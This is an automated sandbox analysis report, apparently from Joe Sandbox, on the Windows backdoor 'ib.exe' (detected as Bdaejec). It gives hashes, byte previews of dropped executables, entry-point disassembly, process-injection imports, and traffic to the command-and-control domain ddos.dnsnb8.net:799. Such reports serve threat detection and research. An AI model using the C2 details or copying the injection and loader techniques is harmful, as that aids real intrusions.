                                                                            Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                                                            Process:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):2389504
                                                                            Entropy (8bit):6.731343345661525
                                                                            Encrypted:false
                                                                            SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                                            MD5:74C27876C65A47147BA285364470602C
                                                                            SHA1:F382E2F940238FA8C42C24AB288B50C317C54B7F
                                                                            SHA-256:C7EA5132A5F03A488EA78AB139E2033B06343F562E7BF4E11D7CCCD1D225A031
                                                                            SHA-512:42778A98C9AC59886784310D5C9E66761FA68AEA3449D7726B39C18CDC6923BA953247AEF405846056471E672FD333C2B33793889B5E8A6328BCC5DDD06F6DA0
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):31744
                                                                            Entropy (8bit):6.366489024805923
                                                                            Encrypted:false
                                                                            SSDEEP:768:uWQ3655Kv1X/qY1MSdRyQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdRBGCq2iW7z
                                                                            MD5:ADE4558B7BB1AB42CCE6F92DF5F0DACC
                                                                            SHA1:BDD2C6CA67C7DAC5B5D503AE6BAF4BAE8AB9EC1D
                                                                            SHA-256:37EFED9E8B690025DE031132CDE63D6EA63C90BDB75AACE86E9738C155F4EC85
                                                                            SHA-512:CD31B1DCBFABB215AE2905884D03573F73BE3D4DEA6DF0D12CB3D5F1750AB0CBD3A81666709760B158AA658817CEE193B1A8A2552244559AF57B15C0D4BE8AFE
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.9871252983947759
                                                                            Encrypted:false
                                                                            SSDEEP:96:qtFSc0M4c3sShno7afzQXIDcQOc6McEQcw3v+HbHg/5ksS/YyNl1zWDUMsxzLOyu:eEhc3i0AI64j8/AmzuiFmZ24IO89
                                                                            MD5:70D0C689CC98EDE888BC9C50BA62EB03
                                                                            SHA1:35F21B354E77962EDE9E2984683C1555EB9FE003
                                                                            SHA-256:A7FBC4AD9A93B5FF88C771D4B72740E5DD430FF9A14754B74516A5CF23C9C3AA
                                                                            SHA-512:FD2AFC0577BF4C2231FB57DF601F9CA360214A9C379C055F468F47A0D66115D6ACB0B969AAC7E455309F2A797BDF6629B1EFFE2F2FB343E67AD37846F5441804
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.1.7.1.2.8.3.0.3.0.4.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.1.7.1.2.8.8.0.3.0.4.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.7.4.0.b.9.1.-.3.0.4.c.-.4.9.9.d.-.9.8.d.a.-.4.0.c.0.a.b.0.7.0.2.4.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.d.a.9.a.c.9.-.8.d.d.b.-.4.4.2.0.-.9.f.d.b.-.a.5.3.e.a.8.4.e.9.b.c.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.j.E.r.a.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.4.-.0.0.0.1.-.0.0.1.4.-.a.6.b.f.-.c.1.7.8.9.d.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.f.0.0.7.6.5.a.c.9.2.8.3.a.b.7.e.8.e.e.9.c.2.3.b.7.7.b.3.5.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.h.j.E.r.a.c...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 14 streams, Sat Oct 26 11:52:08 2024, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):163402
                                                                            Entropy (8bit):1.8069575397620328
                                                                            Encrypted:false
                                                                            SSDEEP:384:/hR9PciBo0B99poD9tjpnvYG7AnsGYaNE9DgYUafJYXX+6WXpj:pR9UgB99pYfjpnvb7AnsSNEJjJYHgj
                                                                            MD5:73E332940C50638847DF70DCBA9FBDB9
                                                                            SHA1:E0B3E9C1DF4E758DE7B9ACC0580026CEC653575E
                                                                            SHA-256:D34829F21B28BE4FBC9A0B4522CA77E28E27CC684E55B317932F52402DE33899
                                                                            SHA-512:52E7D7F7EE2DDAAF9BC8795BE369FCEB2323579866052884F1FAC59CB07EE5ED396F6E18CAE7122780E3AD761851AC9AB07F429D91040E1E31B271A3B5883680
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:MDMP..a..... ..........g............t...............|...........hQ..........T.......8...........T............;..bB.......... !...........#..............................................................................eJ.......#......GenuineIntel............T.......T......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8246
                                                                            Entropy (8bit):3.688493671033932
                                                                            Encrypted:false
                                                                            SSDEEP:192:R6l7wVeJWg6z6Yl36tgLgmfmkOWypDt89b8Ysfv/Um:R6lXJh6z6YV6tgLgmfmkOWF8Lfv5
                                                                            MD5:8440FEB51D5DCA44C511169C60D92641
                                                                            SHA1:A70BC7E1A982EC182F0BDFC0FC8BC7DF740EDF81
                                                                            SHA-256:5EA209652F54F9E4FE686EB12C22D5594413B0C8F6EE23AEAF83AB7E35F8BEAA
                                                                            SHA-512:40671E514815D9114A2A3F5B5F07DBB5E0CE092EDD1FE024D4DFEF7FEEC818AF2044D772AAC7D5B02A4AF20B5D6291E13EAB132A4D6FBD10F4C8206775668CF4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.9.6.<./.P.i.
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4551
                                                                            Entropy (8bit):4.4366818069450495
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwWl8zsPJg77aI9o+clWpW8VYAPYm8M4JsCFVK+q8q1HgBgGid:uIjfxI7K+cU7V9SJW9H2gGid
                                                                            MD5:F2A76E36838923C94EE6E5D82A88DD6B
                                                                            SHA1:0B886FA28B724A0F58A6F1D3A7BDEF7F146A36FA
                                                                            SHA-256:AC7E74BB442C0BE855DF86638512F09EE5EB4533096CBDFEE2F467144C77C757
                                                                            SHA-512:E06E758ECDACB185259B887BAE4F0FB0609972D372E50F93B7E693F667E63BDF0A880043D9D4CE3A2921BD2645A8ADB78C91DFAC3E6DD9C4164C76EEE0E456B1
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560334" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                            Process:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):1.5
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nv:9
                                                                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:foo.
                                                                            Process:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):4
                                                                            Entropy (8bit):1.5
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nv:9
                                                                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                            Malicious:false
                                                                            Preview:foo.
                                                                            Process:C:\Users\user\Desktop\ib.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):15872
                                                                            Entropy (8bit):7.031113762428177
                                                                            Encrypted:false
                                                                            SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                                                            MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                            SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                                                            SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                                                            SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 97%
                                                                            Joe Sandbox View:
                                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse
                                                                            • Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse
                                                                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                                                                            • Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
                                                                            • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                                                                            • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                                                            • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                                                                            • Filename: log1.exe, Detection: malicious, Browse
                                                                            • Filename: log2.exe, Detection: malicious, Browse
                                                                            • Filename: 2.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                            Category:dropped
                                                                            Size (bytes):1835008
                                                                            Entropy (8bit):4.465998607561621
                                                                            Encrypted:false
                                                                            SSDEEP:6144:HIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNhdwBCswSbn:oXD94+WlLZMM6YFHP+n
                                                                            MD5:2D74DA3E8895F55136297001C73F7D38
                                                                            SHA1:37327AD8459A6013EF4EA17501410E07F83E6424
                                                                            SHA-256:9DA04636E9049E84B95853956A4FD24CBF4C0586C77A6651E0C0D8D777A3C7C1
                                                                            SHA-512:AF12582680919F6EAB533B2C9DE8AF4CAF464B9FDA1118AA0EBBA93DF938DDF195E941608BD86CBFF810E699F99A77BA8A7A0009C8027FBE1CD91A1A457075B5
                                                                            Malicious:false
                                                                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.Ly.'..............................................................................................................................................................................................................................................................................................................................................I.ZM........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.484841822206029
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:ib.exe
                                                                            File size:37'376 bytes
                                                                            MD5:1913f1b56f94a777c0130ef6e358586f
                                                                            SHA1:b1bc6735532a06744d37245f172408f8c2f062b0
                                                                            SHA256:79757b669da7754fb0319e313a1c24b9c9e170b7815174ca55959eb3bbca43f3
                                                                            SHA512:b838ae8f592776e80c25e4e6280a6e778fa1a1073d62aea9bd6604bdf25248848a45c8589373a0dd978a6193b8ac454eadf53ebcf187dcaa1eb1308cb0a4799c
                                                                            SSDEEP:768:1LtEcKD6bLDnaJy+bDbM7fSqQGPL4vzZq2o9W7GsxBbPr:1LdugLjR+yfSJGCq2iW7z
                                                                            TLSH:A8F2ADB3FF818EE3C08951740676B7BBC17BA6302BA461D7D792482A0D691D2BD3641F
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EC..+...+...+.......+.......+.../...+...(...+...*...+...*...+...*...+.$."...+.$.....+.$.)...+.Rich..+.................PE..L..
                                                                            Icon Hash:90cececece8e8eb0
                                                                            Entrypoint:0x409000
                                                                            Entrypoint Section:Hu
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows cui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6427DFAD [Sat Apr 1 07:39:25 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:6f770b1c9c60b3d313b72c1a3bde4335
                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            sub esp, 0000016Ch
                                                                            xor eax, eax
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            mov dword ptr [ebp-24h], eax
                                                                            mov dword ptr [ebp-10h], eax
                                                                            mov dword ptr [ebp-14h], eax
                                                                            mov dword ptr [ebp-08h], eax
                                                                            mov dword ptr [ebp-0Ch], eax
                                                                            mov dword ptr [ebp-20h], eax
                                                                            mov dword ptr [ebp-18h], eax
                                                                            mov dword ptr [ebp-48h], 72456A68h
                                                                            mov dword ptr [ebp-44h], 652E6361h
                                                                            mov dword ptr [ebp-40h], 00006578h
                                                                            mov dword ptr [ebp-3Ch], 00000000h
                                                                            call 00007F32F9799755h
                                                                            pop eax
                                                                            add eax, 00000225h
                                                                            mov dword ptr [ebp-04h], eax
                                                                            mov eax, dword ptr fs:[00000030h]
                                                                            mov dword ptr [ebp-28h], eax
                                                                            mov eax, dword ptr [ebp-04h]
                                                                            mov dword ptr [eax], E904C483h
                                                                            mov eax, dword ptr [ebp-04h]
                                                                            mov dword ptr [eax+04h], FFFF9A51h
                                                                            mov eax, dword ptr [ebp-28h]
                                                                            mov eax, dword ptr [eax+0Ch]
                                                                            mov eax, dword ptr [eax+1Ch]
                                                                            mov eax, dword ptr [eax]
                                                                            mov eax, dword ptr [eax+08h]
                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                            mov ecx, dword ptr [ecx+eax+78h]
                                                                            add ecx, eax
                                                                            mov edi, dword ptr [ecx+1Ch]
                                                                            mov ebx, dword ptr [ecx+20h]
                                                                            mov esi, dword ptr [ecx+24h]
                                                                            mov ecx, dword ptr [ecx+18h]
                                                                            add esi, eax
                                                                            add edi, eax
                                                                            add ebx, eax
                                                                            xor edx, edx
                                                                            mov dword ptr [ebp-30h], esi
                                                                            mov dword ptr [ebp-1Ch], edx
                                                                            mov dword ptr [ebp-34h], ecx
                                                                            cmp edx, dword ptr [ebp-34h]
                                                                            jnc 00007F32F979989Eh
                                                                            movzx ecx, word ptr [esi+edx*2]
                                                                            mov edx, dword ptr [ebx+edx*4]
                                                                            mov esi, dword ptr [edi+ecx*4]
                                                                            add edx, eax
                                                                            mov ecx, dword ptr [edx]
                                                                            add esi, eax
                                                                            cmp ecx, 4D746547h
                                                                            jne 00007F32F97997A4h
                                                                            cmp dword ptr [edx+04h], 6C75646Fh
                                                                            jne 00007F32F979979Bh
                                                                            Programming Language:
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x4ca80xf0.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x1e0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x430.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x44600x70.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43a00x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x40000x1b8.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x29540x2a00d3c81030df1ef822e29ecc6eeacb3a51False0.5792410714285714data6.177173611938834IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x40000x17640x18004c2efc18cc96d0174f89696a5f623930False0.4231770833333333data4.76476561394463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x60000x5700x20008f9fe4694554cc5032a6182e6be54e2False0.41015625data4.312951008582929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x70000x1e00x2000b35de07beeb30d1d6013cbca2846303False0.525390625data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x80000x4300x600dfc77dcd70cf1807a7169892e07b9868False0.63671875data5.299296196371604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            Hu0x90000x50000x420064aed0e40be53821918cbf9e02397daaFalse0.77734375data6.93404046385773IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_MANIFEST0x70600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                            DLLImport
                                                                            KERNEL32.dllSleep, GetLastError, WaitForSingleObject, GetCurrentProcessId, CreateMutexA, GetModuleHandleA, OpenProcess, CloseHandle, GetProcAddress, VirtualAllocEx, CreateRemoteThread, K32GetProcessImageFileNameA, SuspendThread, ResumeThread, K32EnumProcessModulesEx, K32GetModuleFileNameExA, CreateThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, WriteProcessMemory
                                                                            USER32.dllSetCursorPos, GetSystemMetrics, GetWindowThreadProcessId, CallNextHookEx, SetWindowsHookExA, UnhookWindowsHookEx, TranslateMessage, PeekMessageA, keybd_event, MapVirtualKeyA, mouse_event, SendInput, MessageBoxA, PostQuitMessage, DispatchMessageA, GetForegroundWindow
                                                                            SHLWAPI.dllStrStrIA
                                                                            MSVCP140.dll?_Xlength_error@std@@YAXPBD@Z, ?_Xbad_function_call@std@@YAXXZ, _Thrd_detach, ?_Throw_Cpp_error@std@@YAXH@Z, ?_Throw_C_error@std@@YAXH@Z, _Cnd_do_broadcast_at_thread_exit
                                                                            WS2_32.dllrecvfrom, setsockopt, WSAGetLastError, socket, sendto, WSAStartup, htons, inet_addr
                                                                            VCRUNTIME140.dllmemset, _except_handler4_common, strstr, __current_exception_context, __CxxFrameHandler3, __std_exception_destroy, __std_exception_copy, _CxxThrowException, __current_exception
                                                                            api-ms-win-crt-runtime-l1-1-0.dll_controlfp_s, _seh_filter_exe, terminate, _beginthreadex, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _initialize_onexit_table, _crt_atexit, _set_app_type, exit, _register_onexit_function
                                                                            api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, _set_fmode, __stdio_common_vfprintf
                                                                            api-ms-win-crt-heap-l1-1-0.dll_callnewh, free, malloc, _set_new_mode
                                                                            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-26T13:52:03.656735+02002838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup1192.168.2.4593341.1.1.153UDP
                                                                            2024-10-26T13:52:04.339917+02002807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin1192.168.2.44973044.221.84.105799TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 26, 2024 13:52:03.777404070 CEST49730799192.168.2.444.221.84.105
                                                                            Oct 26, 2024 13:52:03.783031940 CEST7994973044.221.84.105192.168.2.4
                                                                            Oct 26, 2024 13:52:03.785768986 CEST49730799192.168.2.444.221.84.105
                                                                            Oct 26, 2024 13:52:03.786037922 CEST49730799192.168.2.444.221.84.105
                                                                            Oct 26, 2024 13:52:03.791631937 CEST7994973044.221.84.105192.168.2.4
                                                                            Oct 26, 2024 13:52:04.339853048 CEST7994973044.221.84.105192.168.2.4
                                                                            Oct 26, 2024 13:52:04.339916945 CEST49730799192.168.2.444.221.84.105
                                                                            Oct 26, 2024 13:52:04.371823072 CEST7994973044.221.84.105192.168.2.4
                                                                            Oct 26, 2024 13:52:04.371886969 CEST49730799192.168.2.444.221.84.105
                                                                            Oct 26, 2024 13:52:04.373011112 CEST49730799192.168.2.444.221.84.105
                                                                            Oct 26, 2024 13:52:04.378297091 CEST7994973044.221.84.105192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 26, 2024 13:52:03.656734943 CEST5933453192.168.2.41.1.1.1
                                                                            Oct 26, 2024 13:52:03.757278919 CEST53593341.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 26, 2024 13:52:03.656734943 CEST192.168.2.41.1.1.10xa776Standard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 26, 2024 13:52:03.757278919 CEST1.1.1.1192.168.2.40xa776No error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
                                                                            • ddos.dnsnb8.net:799
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
